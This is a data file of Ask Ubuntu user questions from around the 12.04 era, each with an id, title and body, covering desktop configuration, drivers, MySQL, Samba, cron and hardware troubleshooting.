156252	how to make conky auto-hide ?	i think my question is pretty clear . what i want to achieve in conky is auto-hide feature . the reason for this : let 's suppose i am browsing and suddenly i want to see my battery status or eth0 downspeed or ram usage . currently what i do is press win + d to show desktop and than see my conky . is it possible that i can hover my mouse to the top of my screen ( conky align = tm ) and it displays the conky setup . if it is not possible than is there any other way i can access conky quickly .
156259	how to get yelp to open the docs ?	quickly tutorial result : an empty yelp window with the xml file opened in gedit . yelp /usr/share/quickly/templates/ubuntu-application/help/tutorial.xml -- > exactly the same problem . worked fine a few days ago . manually changing the file association of xml files to yelp ( which i actually do n't want to do , because all other xml files should open in gedit ) , and then running the command again gets my system into an infinite loop .
156270	how to connect my cdma modem ?	i am using a cdma 1x modem in india . i is extremely slow but comes with a unlimited package . so thats why i can not leave it . i tried to configure it using network manager but it didnt work . the manufacturer is linktop . the model number is 3197 the output of lsusb is- bus 004 device 002 : id 05c6:3197 qualcomm , inc cdma wireless modem/phone can anyone help me please ?
156271	can i use other open source libraries in the application contest ?	i just found out about and started looking into the ubuntu app contest , and i wanted to double check the contest 's stance on using open source libraries built by others that are freely available on the web . i read through the rules and some of the other q & as , and it sounds like using these libraries would not be allowed ( since it could mean the app is n't built from scratch , and the library would not be in the ubuntu archive - although i could bundle the library with the app ) , and i just wanted to verify this assumption .
156274	can i submit an application started one year ago to the ubuntu app showdown ?	i started developing an application one year ago . i published it in sourceforge and it runs in ubuntu , but i did not send it to the software centre . may i send it to the ubuntu app showdown contest ?
156276	how do i tell ubuntu to only install is asked for and do not bring other dependencies which will break the whole system ?	how can i only install python-webkit but not other packages ? which is showing to install ? ( no gstreamer* . * , i do not want to have any single files installed in my distro because of gpl license and it slows my machine a lot ) $ sudo apt-get install libwebkitgtk-1.0-0 python-webkit reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 suggested packages : gstreamer-codec-install gnome-codec-install gstreamer0.10-tools gstreamer0.10-plugins-base the following new packages will be installed : libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libwebkitgtk-1.0-0 0 upgraded , 3 newly installed , 0 to remove and 333 not upgraded . need to get 8,231 kb of archives . after this operation , 28.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? n abort .
156277	how do i automatically monitor smart with external usb drives and warn if necessary ?	my external usb drive died , and ubuntu gave no indication that it there was a problem . it would be useful if the system gave a warning for failing drives , including external usb ones . is there a way to get this to work ?
156280	# 1045 can not log in to the mysql server	i am totally new in linux/ubuntu i am trying to setup lamp on my os , however i 've installed apache , php , mysql by following commands : sudo apt-get install apache2 sudo apt-get install php5 sudo apt-get install libapache2-mod-php5 sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql sudo apt-get install phpmyadmin everything works fine except that i totally can not log into mysql ( which leads to phpmyadmin failure login ) getting the errors : # 1045 can not log in to the mysql server access denied for user 'root ' @ 'localhost ' ( using password : yes ) i googled the problem and also i have tried to reinstall all installed components , but the same result came up ! in windows i usually modified the content of mysql configure file but in ubuntu nothing is as same as windows ! : ) can anybody help me on this , really need to setup lampp : -s thanks in advanced
156284	ca n't get firefox to render the right size in a headless xvfb instance	i can start the xvfb instance just fine xvfb :1 -screen 0 800x600x24 i can then launch firefox and have it load correctly but the window is always smaller than the resolution i set during the xvfb command . firefox http : //www.ebay.com -- display=:1 you can see the black bar , that 's the full resolution . it appears it 's sizing to what the page wants but it will never fill it out completely .
156286	xgamma -display parameter for dual monitor setup	i want to change gamma for my first monitor . every time i invoke xgamma with different -display parameters it somehow points to my second monitor . but i want to modify first one . i tried these commands . the parameters i have used for -display are :0 , :0.0 , :0.1 , :1.0 , :1.1 , :1 . only the first 2 works . but it points to my second monitor . not the first one . here is a shell script to test it . shiplu @ kubuntud : ~ $ xgamma -display :0 - > red 1.000 , green 1.000 , blue 1.000 shiplu @ kubuntud : ~ $ xgamma -display :0.0 - > red 1.000 , green 1.000 , blue 1.000 shiplu @ kubuntud : ~ $ xgamma -display :0.1 xgamma : unable to open display ':0.1' shiplu @ kubuntud : ~ $ xgamma -display :1.0 xgamma : unable to open display ':1.0' shiplu @ kubuntud : ~ $ xgamma -display :1.1 xgamma : unable to open display ':1.1' shiplu @ kubuntud : ~ $ xgamma -display :1 xgamma : unable to open display ':1' how can i change the gamma for the first/primary monitor ?
156295	how do i set and use shell variables ?	irstlm= $ home/irstlm i need help setting this variable up . was wondering if this is correct syntax irstlm=/home/user/irstlm is that possible to run from root ? i need it to be done in root in order to access certain files , i can also add the rest of the command i am trying to run if you 'd like to see the context it 's being used inn . new problem , do n't know why but should n't this output the file with extension .arpa ? i dont seem to get that file and i require it to run the next command to finish compiling this program . ~/irstlm/bin/add-start-end.sh < ~/corpus/news-commentary-v7.fr-en.true.en > news-commentary-v7.fr-en.sb.en export irstlm= $ home/irstlm ; ~/irstlm/bin/build-lm.sh -i news-commentary-v7.fr-en.sb.en -t ./tmp -p -s improved-kneser-ney -o news-commentary-v7.fr-en.lm.en here is the full command : /home/user/irstlm/bin/add-start-end.sh < /home/user/corpus/news-commentary-v7.fr-en.true.en > news-commentary-v7.fr-en.sb.en export irstlm= $ home/irstlm ; /home/user/irstlm/bin/build-lm.sh -i news-commentary-v7.fr-en.sb.en -t ./tmp -p -s improved-kneser-ney -o news-commentary-v7.fr-en.lm.en
156296	can i install microsoft office ? if so , how ?	i want to know how to install microsoft office ( specifically , microsoft office 2010 ) in ubuntu ? i am a die hard fan of ms office and i want to know if there is a way i can use it in ubuntu .
156298	pressing f1 to continue	i am running 12.04 studio on an asus pc . when i log on , i have to press f1 to continue . i am using a usb keyboard and get an error message saying `` keyboard interface error press f1 to continue . '' is there any way around this please ?
156306	ubuntu 12.04 installation problem on windows 7 64bit	06-26 20:57 error tasklist : extraction failed with code : 2 traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 450 , in extract_diskimage exception : extraction failed with code : 2 06-26 20:57 debug tasklist : # cancelling tasklist 06-26 20:57 debug tasklist : # finished tasklist 06-26 20:57 error root : extraction failed with code : 2 traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 450 , in extract_diskimage exception : extraction failed with code : 2
156311	i can not use software-center or `apt-get update`	i ca n't open ubuntu software-center . and i ca n't update in terminal . when i type sudo apt-get update , it just shows : e : malformed line 2 in source list /etc/apt/sources.list.d/gnomebaker.list ( dist parse ) e : the list of sources could not be read
156312	i managed to set up a samba file server , but have to use gksudo to add or remove files !	i managed to set up a samba file server , but have to use gksudo to add or remove files ! also , the windows pc 's can not copy or use the files contained in the share . how do i rectify this ? the line `` read only = no '' is set properly in my .config file . here is my smb.conf : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = matt # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = wins lmhosts hosts bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 1o eth1 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes security = user guest ok = yes guest account = pcguest username map = /etc/samba/smbusers # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ share ] comment = ubuntu file server share path = /srv/samba/share browseable = yes guest ok = yes read only = no create mask = 0755
156322	is it efficient to run my server on a live cd ?	for the specific server that i plan on running , i 've read online that it runs faster when hosted on a linux based os . i have a copy of a ubuntu disk . i do n't plan on hosting this server often and wondered if it was worth the trouble booting from the disk ( not installing ) and just running the server from the live cd ? are there any drawbacks from being in the preview ? will it nullify my benefits ?
156325	ca n't boot into windows 7 after installing ubuntu 12.04	when my computer loads the grub menu shows up and gives the option to either boot to ubuntu or to windows 7 , however when i click on windows 7 it writes some lines and then brings me back to the grub boot menu . i tried repairing using boot-repair , and it did n't work , instead i now have 2 entries for windows 7 , and neither work . here is the url : http : //paste.ubuntu.com/1060937/ please help ! thank you in advance .
156326	data files for quickly apps	my quickly app requires data files to store settings , configuration and etc . how would i do this inside the app folder . keep in mind that i will need to read and write to these files while the app is running on a client 's computer . thanks .
156329	screen flickering in ubuntu 12.04 lts	for those of you who can help me..i recently installed ubuntu 12.04 lts and i got this screen flickering at the log on screen ... i googled this problem and i found out that laptops with nvidia graphics have it ... but i have intel hd graphics in mine ... i tried `` nomodeset '' and it was solved but my screen resolution changed to 1024x768 and i could n't change it to 1366x768 ... so im using ubuntu 11.10 for now ... what should i do ? ? for those who can help me..i 'm a newbie at ubuntu and i know nothing..so please detail your answer ... . anyone ? ?
156330	cronjob not working	i have added a new line to my crontab file , but this line wo n't work . this is the code of my crontab file : # music scrobbler # every 5 minutes */5 * * * * php -f /var/www/music/scrobble/index.php # radio scrobbler # every minute */1 * * * * php -f /var/www/fmstats/scrobble/cron/scrobble.php > /fmstats.log the first line works perfectly , but the second does nothing . it should output a list of radio stations but fmstats.log is always empty . it should also add a row to a database wich does n't happen either . if i execute the file manualy using the console or via the browser , it works just fine .
156332	how to activate wireless drivers in dell inspiron ?	i have a dell inspiron 1470 and i just installed ubuntu 12.04 . my wireless networks were n't working . i went to system settings > > additional drivers . i saw `` broadcom sta wireless driver '' under that list and clicked activate . it does n't get activated and gives an error . the error is : look at the log file /var/log/jockey.log how to activate it and get my wireless working ?
156336	ubuntu 12.04 on bangho	this question is ( mostly ) for people in argentina . ¿have anyone tried installing ubuntu 12.04 on a bangho notebook ( with i3-560 processor ) ? i have n't found any experiences online with this brand . the specs of the sistem are below ( in spanish ) : procesador intel corei3 serie 2300 memoria 4gb . ddr3 . - disco rígido sata 500gb . chipset intel hm65 video intel hm65 configurable hasta 1748mb placa de red 10/100/1000 , wireless 802.11b/g/n bluetooth pantalla 15.6 '' hd ( 1366 x 768 ) - peso 2,3kg . best regards , q
156340	quickly message box	how to make message like this using quickly
156344	accented keys not working correctly	i 'm running 12.04 precise pangolin , with gnome 3 , and it looks like my computer has some strange ideas when it comes to accented keys . without changing any of the settings , the results i get are strange and inconsistent : altgr + a = æ altgr + e = e altgr + u = ↓ altgr + 2 = ² altgr + n = n altgr + g = ŋ altgr + shift + e = e altgr + shift + u = ↑ altgr + [ then e = ë altgr + [ then o/i/u/a = nothing - these are the methods i 've tried to use to get umlauted characters altgr + 2 = ² altgr + shift + 2 = ⅛ altgr + shift + 2 + o = ⅛ø altgr + 2 + o = ²ø when i follow the instructions here https : //help.ubuntu.com/11.04/ubuntu-help/tips-specialchars.html , and i set the compose key to be right alt , altgr ( which is the alt key to the right of the space bar ) turns into a fully working regular alt key , and i can not enter any special characters . changing the `` key to choose third level '' has no effect . i would prefer to have the fully working accented character system , but i 'd settle for just being able to get ß and the vowels with umlauts . thanks
156348	how can i get add-apt-repository to work ?	whenever i try to add a repository via the command line , i get the following error message : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 60 , 'server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none ' ) is there a way to remedy this situation ?
156350	rhythmbox is missing last.fm and libre.fm like button in 12.04	i 've just updated and those buttons are gone . any ideas how i can have these buttons back ? there is a duplicated question over here but it was closed as off topic .
156359	`` authentication manipulation error '' when trying to reset my password	to reset forgotten password in 12.04 lts . i am able to boot the computer . i choose root option and then come to password changing . they ask me to enter new unix password which i do type . but at last they give a command saying authentication manipulation error and my password is unchanged .
156361	dell inspiron 1545 unresponsive and laggy with continued use	i have a fresh install of ubuntu 12.04 installed with wubi ( precise pangolin ) on a dell inspiron 1545 . until i updated yesterday , the system had problems . windows were losing focus and the sytem was continually slow and unresponsive . after updating , it worked great for hours . but after some time the same problems came back . i ca n't even write in libreoffice or browse the web because of the lag . i reduced the swappiness to 10 , but that only helps when i start up until it starts going unstable . i searched forums and found similar posts . the ones i can relate to are caused by x.org , the intel graphics card , or unity memory leaks . any ideas about what is causing my problem ?
156366	producing lot of heat and fan sound , while using ubuntu 12.04 on dell xps-l502x	i have installed ubuntu 12.04 in my xps l502 . everything works fine except the system heat . i can feel that the laptop heat rises more and fan sound also , when i am using ubuntu . but with windows 7 that came pre-installed with laptop heat is normal . i like to use ubuntu on this laptop , but because of this reason i am not able to do that . please help .
156367	messed up my 12.04 graphics : falsely installed nvidia drivers on hd graphics	ok hope you can help . after installing ubuntu 12.04 i noticed that my graphics were sluggish so i decided to install the new nvidia drivers . wrongly i assumed i needed nvidia drivers . stupid mistake , my laptop has a intel hd graphics driver . damage is done . computer is stuck in 640x480 and i ca n't change it . i removed the nvidia drivers : sudo apt-get remove nvidia-current and tried installing mesa-utils : sudo apt-get install mesa-utils still nothing . please help .
156368	best way to sync music to galaxy nexus ( mtp ) ?	the galaxy nexus uses mtp which makes general use a bit of a pain . luckily , ubuntu comes with some drivers preinstalled so i can access my phones memory easily through nautilus , however rhythmbox and banshee do n't seem to like it as much . rhythmbox will crash when i try and sync and on banshee i get a slew of errors . i am spoiled by the likes of doubletwist on windows with which i could sync my itunes library with wirelessly . obviously neither itunes nor doubletwist work on ubuntu so i would like to find some alternative . worst case scenario i can manually transfer all my music ( trying to completely get rid of windows here ) . now , i know a lot of my id3 tags in my music library are not what i like them to be ( when i first launched rhythmbox i had to rename a lot of stuff ) and i 'm really ocd about all that . when i edit my song information will it edit the id3 tag ? if so then i can manage my musics id3 tags via rhythmbox , and then manually transfer it . loving ubuntu and trying to get out of the grip windows and os x had on me for the longest time .
156372	ca n't upload project to ppa using quickly	i ca n't get quickly to upload my project into my ppa . i 've set up my pgp key and used it so sign the code of conduct , and the ppa exists . i do n't know what other usefull information i can supply . robin @ robinj : ~/ubuntu one/python/gtkreddit $ quickly share -- ppa robinj/gtkredditget launchpad settings launchpad connection is ok gpg : warning : unsafe permissions on configuration file `/home/robin/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/robin/.gnupg/gpg.conf' gpg : warning : unsafe permissions on configuration file `/home/robin/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/robin/.gnupg/gpg.conf' traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 138 , in < module > license.licensing ( ) file `` /usr/share/quickly/templates/ubuntu-application/license.py '' , line 284 , in licensing { 'translatable ' : 'yes ' } ) file `` /usr/share/quickly/templates/ubuntu-application/internal/quicklyutils.py '' , line 166 , in change_xml_elem xml_tree.find ( parent_node ) .insert ( 0 , new_node ) attributeerror : 'nonetype ' object has no attribute 'insert' error : share command failed aborting i reported this as a bug on launchpad , because i assume that it is a bug . if you know a quick workaround , please let me know . https : //bugs.launchpad.net/ubuntu/+source/quickly/+bug/1018138
156374	is postfix to send or receive email ?	a bit confused , is postfix to receive or send email ? i am using a 3rd party to send email , and just need to receive email and was wondering if postfix is what i should be researching .
156380	why is my external usb hard drive sometimes completely inaccessible ?	i have an external usb hard drive , consisting of an 1 tb sata drive in a rosewill rx35-at-su slv aluminum 3.5 '' silver usb 2.0 external enclosure , plugged into my sony vaio vgn-ns310f laptop . it is plugged directly into the computer ( not through a hub ) . the drive inside the enclosure is a 7200 rpm western digital , but i do n't remember the exact model . i can remove the drive from the enclosure ( again ) , if people think it 's necessary to know that detail . the drive is formatted ext4 . i mount it dynamically with udisks on my lubuntu 11.10 system , usually automatically via pcmanfm . ( i have had lubuntu 12.04 on this machine , and experienced all this same behavior with that too . ) every once in a while -- once or twice a day -- it becomes inaccessible , and difficult to unmount . attempting to unmount it with sudo umount ... gives an error message saying the drive is in use and suggesting fuser and lsof to find out what is using it . killing processes found to be using the drive with fuser and lsof is sometimes sufficient to let me unmount it , but usually is n't . once the drive is unmounted or the machine is rebooted , the drive will not mount . plugging in the drive and turning it on registers nothing on the computer . dmesg is unchanged . the drive 's access light usually blinks vigorously , as though the drive is being accessed constantly . then eventually , after i keep the drive off for a while ( half an hour ) , i am able to mount it again . while the drive does n't work on this machine for a while , it will work immediately on another machine running the same version of ubuntu . sometimes bringing it back over from the other machine seems to `` fix '' it . sometimes it does n't . the drive does n't always stop being accessible while mounted , before becoming unmountable . sometimes it works fine , i turn off the computer , i turn the computer back on , and i can not mount the drive . currently this is the only drive with which i have this problem , but i 've had problems that i think are the same as this , with different drives , on different ubuntu machines . this laptop has another external usb drive plugged into it regularly , which does n't have this problem . unplugging that drive before plugging in the `` problem '' drive does n't fix the problem . i 've opened the drive up and made sure the connections were tight in the past , and that did n't seem to help ( any more than waiting the same amount of time that it took to open and close the drive , before attempting to remount it ) . does anyone have any ideas about what could be causing this , what troubleshooting steps i should perform , and/or how i could fix this problem altogether ? update : i tried replacing the usb data cable ( from the enclosure to the laptop ) , as merlin suggested . i should 've tried that long ago , since it fits the symptoms perfectly ( the drive works on another machine , which would make sense because the cable would be bent at a different angle , possibly completing a circuit of frayed wires ) . unfortunately , though , this did not help -- i have the same problem with the new cable . i 'll try to provide additional detailed information about the drive inside the enclosure , next time i 'm able to get the drive working . ( at the moment i do n't have another machine available to attach it . ) major update ( 28 june 2012 ) the drive seems to have deteriorated considerably . i think this is so , because i 've attached it to another machine and gotten lots of errors about invalid characters , when copying files from it . i am less interested in recovering data from the drive than i am in figuring out what is wrong with it . i specifically want to figure out if the problem is the drive or the enclosure . now , when i plug the drive into the original machine where i was having the problems , it still does n't appear ( including with sudo fdisk -l ) , but it is recognized by the kernel and messages are added to dmesg . most of the message consist of errors like this , repeated many times : [ 7.707593 ] sd 5:0:0:0 : [ sdc ] unhandled sense code [ 7.707599 ] sd 5:0:0:0 : [ sdc ] result : hostbyte=invalid driverbyte=driver_sense [ 7.707606 ] sd 5:0:0:0 : [ sdc ] sense key : medium error [ current ] [ 7.707614 ] sd 5:0:0:0 : [ sdc ] add . sense : unrecovered read error [ 7.707621 ] sd 5:0:0:0 : [ sdc ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 [ 7.707636 ] end_request : critical target error , dev sdc , sector 0 [ 7.707641 ] buffer i/o error on device sdc , logical block 0 here are all the lines from dmesg starting with when the drive is recognized . please note that : i 'm back to running lubuntu 12.04 on this machine ( and perhaps that 's a factor in better error messages ) . now that the drive has been plugged into another machine and back into this one , and also now that this machine is back to running 12.04 , the drive 's access light does n't blink as i had described . looking at the drive , it would appear as though it is working normally , with low or no access . this behavior ( the errors ) occurs when rebooting the machine with the drive plugged in , and also when manually plugging in the drive . a few of the messages are about /dev/sdb . that drive is working fine . the bad drive is /dev/sdc . i just did n't want to edit anything out from the middle .
156383	how to have colored manual pages in gnome-terminal	when i switched to tty i noticed manpages look different by using some color scheme . how to make it to gnome-terminal ? update : here is a solution , i found at unix stackexchange site .
156387	package candidate/alternative for the python-pgsql package in 11.10	what is the package candidate or alternative for the python-pgsql ( module ) package in ubuntu 11.10 ? an error indicator that could help : error : you need to have the python-pgsql module installed to use this script . 'apt-get install python-pgsql ' on debian . update : the davical-cmdlnutl version 1.2.0 works .
156392	what is the equivalent of an `` exe file '' ?	i do n't know what the exact executable file extension is . is it .deb or .tar.gz ? can anyone on ask ubuntu help ?
156394	how to add fade-out and fade-in effects by convert command ?	convert command can make the mpeg video from the several pictures . for example : convert -delay 300 *.png test.mpg well , is it possible to add fade-out and fade-in effects into the mpeg video by using convert ? if it is possible , how can i do it ?
156395	my right-click properties option in root file system shows 140.8 tb memory of contents	partly it is a curious question . ( pretty stupid though ) i am using ubuntu 12.04 64-bit system with unity as de . i was doing a routine to free -up some memory space by manual deletion of unwanted files ( mostly songs and videos ) and thereby right-clicking to verify for freed space . but doing a right-click properties option in root file system shows tremendous amount of contents memory 140.8 tb as follows my ubuntu is installed on 50 gb partition with ext4 as format having only / and swap as os installation in dual boot with windows 7 .my internal hard disk is 1tb only . so what exactly is it showing and why is it pointing such huge memory . what are the reasons for that huge memory show . p.s . : must be related to some linux os file system based concept i have n't yet learned or looked into . o/p of df -h filesystem size used avail use % mounted on /dev/sda8 49g 12g 36g 25 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 773m 860k 772m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 784k 1.9g 1 % /run/shm
156401	ubuntu one on winxp	i want to use ubuntu one between my ubuntu 12.04 box ( at home ) and my windows xp box ( at work ) . no problems on creating an account from ubuntu ; on windows i installed the previous version ( 2.0 ) but as i am behind a proxy it did n't work ; i installed version 3.0.2 ( it seems it has a proxy option ) but after install it wo n't start . no matter how many times i click in the icon , nothing happens . any ideas ?
156403	how to submit ideas for the ubuntu apps showdown to reddit ?	i submitted 4 app ideas , but only one pass through to the list on reddit , the others 3 even not searchable : medication tracker trellochat twiliophone i also submitted the blog post , firstly it went through to the list , but disappeared the next day . am i missed anything ? update : at least i 'm not alone with this issue , see comments on the following wrap-up 's : ubuntu app showdown week 1 wrap-up ubuntu app showdown week 2 wrap-up
156409	how do i add or delete user accounts ?	how do i add or delete user accounts in ubuntu ? i know that the `` useradd '' command could be used to do this , but i hear that ubuntu has some other command-line tool and some gui somewhere , either one of which i could use to make adding , deleting , and otherwise managing user accounts much easier and less error-prone . ( an ideal answer will also mention the standard stuff a sysadmin should do immediately after creating a typical new user account -- using diceware to generate a new memorable password , etc . ) .
